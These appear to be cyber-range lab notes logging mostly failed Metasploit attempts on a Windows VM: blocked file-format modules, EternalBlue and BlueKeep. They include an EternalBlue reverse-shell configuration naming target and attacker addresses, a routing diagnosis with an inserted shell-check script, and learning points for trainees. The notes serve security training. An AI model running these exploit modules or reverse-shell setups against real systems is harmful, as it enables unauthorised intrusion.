3. Payload Delivery > Code-Execution (Type 3)

Assign: Yang Jun
Date:
Status: Completed
Property:

Setup Kali Linux VM + Metasploit

Kali Linux VM Download Link: https://www.kali.org/get-kali/

Offensive Step Documentation

Attempt 1 BLOCKED: Tried running the /windows/fileformat/office_ms17_11882 module but was unsuccessful. Windows Defender identified the RTF file as a virus.
 
Attempt 2 FAILED: Tried running the windows/browser/chrome_filereader_uaf module but was unsuccessful. Stuck in a loop of sending:
[screenshot]
Still unsuccessful even after disabling the sandbox. The likely reason it doesn't work is that it has been patched in later versions of Chrome.
 
Attempt 3 BLOCKED: Tried running the /windows/fileformat/adobe_geticon module but was unsuccessful. Similar to attempt 1, Windows Defender identified the PDF file as a virus.
 
*Quite a number of exploit modules in Metasploit are old, i.e. from many years back. These likely won't work because the vulnerabilities have been patched. Need to either find a recent one that works or try to download an older version of the particular application.
References:
 
Attempt 4: EternalBlue exploit FAILED
From our internal recon, we found that port 445 is open on the target machine. This port is needed for EternalBlue to work.
[screenshot]
We can see that the target machine IS vulnerable to EternalBlue after running the scanner module in Metasploit.
[screenshot]
Next, I ran the windows/smb/ms17_010_eternalblue module on the target machine. The module was unable to establish a meterpreter/shell session.
Config used:
RHOST = 10.10.10.218 (Target IP)
RPORT = 445
LHOST = 10.10.10.102 (Kali IP)
LPORT = 4444
Payload = windows/x64/shell/reverse_tcp
[screenshot]
Reopened msfconsole and retried. WIN instead of FAIL, but still no command shell...
[screenshot]
Tried interacting with the session but nothing happens... it seems the command shell opened and closed immediately.
[screenshot]
References:
 
Attempt 5: BlueKeep_RCE exploit FAILED
[screenshot]
 
Attempt 6: EternalBlue exploit using payload generic/shell_reverse_tcp
[screenshot]
Able to get a shell now, but entering a command causes it to close...
Attempt to upgrade the shell to meterpreter failed because the connection got reset...
[screenshot]
 
Attempt 7: EternalBlue exploit using payload generic/shell_bind_tcp
[screenshot]
No shell again...

Jym's Comments

Remove Kali from ZeroTier

[screenshot]
Upgraded to Meterpreter...
[screenshot]

Routing is the root cause of Yang Jun's problems

So what happened is I added 2 routes for me to access the Cyber Range directly...
I needed to add Kali into ZT so that YJ could access it remotely, but due to the routing that I needed, I created a problem for him: when the Kali tries to send payloads again, they end up going to ZT.
[screenshot]
 
[screenshot]
I manually took the URL to the target to run... but it failed. This means something is wrong with the networking...
[screenshot]
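The routing problem described in this section boils down to one check: does the source address the kernel actually uses to reach RHOST match the LHOST that was configured? If it does not, the callback address handed to the target is unreachable from the lab network, which is exactly the symptom of the sessions dying here. The following is an added example, not part of the original notes or of Metasploit: a small POSIX shell check that reads one line of `ip route get <RHOST>` output and compares its `src` field with the intended LHOST. The two sample route lines are constructed; the ZeroTier interface name `ztabcdef01` and the 192.168.191.5 address are placeholders.

```bash
#!/bin/sh
# Added example (not from the original lab notes): verify that the address the
# kernel would use as source for RHOST matches the LHOST configured in the
# listener. A mismatch means reverse-connection callbacks leave via the wrong
# interface (e.g. a ZeroTier address instead of the lab LAN address).

# Print the "src" address from one line of `ip route get` output.
route_src() {
    # $1: e.g. "10.10.10.218 via 10.10.10.1 dev eth0 src 10.10.10.102 uid 1000"
    printf '%s\n' "$1" | awk '{ for (i = 1; i < NF; i++) if ($i == "src") print $(i + 1) }'
}

# Compare the route's source address with the intended LHOST.
# Prints "ok" on a match, "mismatch:<actual src>" otherwise.
check_lhost() {
    route_line="$1"
    lhost="$2"
    src=$(route_src "$route_line")
    if [ "$src" = "$lhost" ]; then
        echo "ok"
    else
        echo "mismatch:$src"
    fi
}

# Constructed sample outputs (not captured from the lab).
# Healthy case: the lab LAN interface routes to the target.
LAN_ROUTE="10.10.10.218 dev eth0 src 10.10.10.102 uid 1000"
# Broken case: a ZeroTier route has captured the target prefix (placeholder values).
ZT_ROUTE="10.10.10.218 dev ztabcdef01 src 192.168.191.5 uid 1000"

# On the attacker box the live check would be:
#   check_lhost "$(ip route get 10.10.10.218 | head -n 1)" 10.10.10.102
check_lhost "$LAN_ROUTE" 10.10.10.102
check_lhost "$ZT_ROUTE" 10.10.10.102
```

Run it before starting an exercise on the range: an `ok` confirms the listener address is the one the target can actually reach, while a `mismatch:` line points straight at the offending route (`ip route show` will then list which interface owns the prefix).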
 

Partial Access

NOT using reverse_tcp (generic/shell_bind_tcp, see below). Yang Jun, I'll kill my session, you try again. Wait, I'll try to upgrade to Meterpreter... failed.
[screenshot]
[screenshot]
[screenshot]
 
[screenshot]
Installed a separate Win7 SP1 64-bit VM to test concurrently... same as the initial .218 experience, all FAIL...
Will add a shared folder to retest... looks like it still refuses to work for the new VM...

Points to experience for learner

  • Realise that exploit payloads from many of these popular offensive tools (e.g. Metasploit) are mostly NOT viable on Win10
  • Compare this experience with your Type 2 Code-Execution attempt, & even Type 1 if there were NO app-control with OpenEDR
    • Why would any sane person make his/her life difficult when there are easier ways to execute code?
  • You selected the exploits you did because you knew what was inside the VM; what if you don't know?
  • Even when the EternalBlue scanner reported the target as "vulnerable", that result may not be reliable.